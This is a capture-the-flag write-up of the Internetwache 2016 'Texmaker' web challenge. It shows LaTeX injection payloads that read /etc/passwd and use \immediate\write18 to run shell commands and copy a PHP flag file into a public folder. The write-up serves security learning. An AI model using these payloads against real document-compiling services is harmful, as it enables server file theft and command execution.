Internetwache CTF 2016 — Web90 — Texmaker

stargravy
Feb 21, 2016

This problem was my favorite of those I tried. When first navigating to the challenge site you are presented with an input field which generates LaTeX, which is then compiled into a PDF.

This paper discusses methods for exploiting LaTeX, including some sample code which could be used for reading files from the server.

\openin5=/etc/passwd          % open the target file on input stream 5
\def\readfile{%               % read one line at a time until end of file
\read5 to \curline
\ifeof5 \let\next=\relax      % stop at end of file
\else \curline~\\             % otherwise typeset the line and continue
\let\next=\readfile
\fi
\next} %
\ifeof5 Couldn't Read the File! %   \openin sets eof if the file could not be opened
\else \readfile \closein5
\fi

After generating and checking the PDF I got the following:

Sweet sweet local files

The next step was learning how I could execute commands to look around the file system. I came across the \immediate\write18 combination of commands in this post, which allows you to run shell commands on the server. The following line redirects the output of ls to a temporary file.

\immediate\write18{ls /tmp/ > /tmp/tmpfile}

Looking into the /var/www/texmaker.ctf.internetwache.org/ directory, I found what I suspected was my flag file (flag.php).

Probably just cat the file right?

After trying a number of other ways of accessing the file (cat, grep, sed, head, tail, etc.) I tried to run php -s, which returns the source of the input PHP file.

I put together the following final payload and browsed to /pdf/derp.txt (as it was publicly accessible), revealing the flag!

\immediate\write18{php -s ../flag.php > ../pdf/derp.txt}
There’s the flag!

IW{L4T3x_IS_Tur1ng_c0mpl3te}
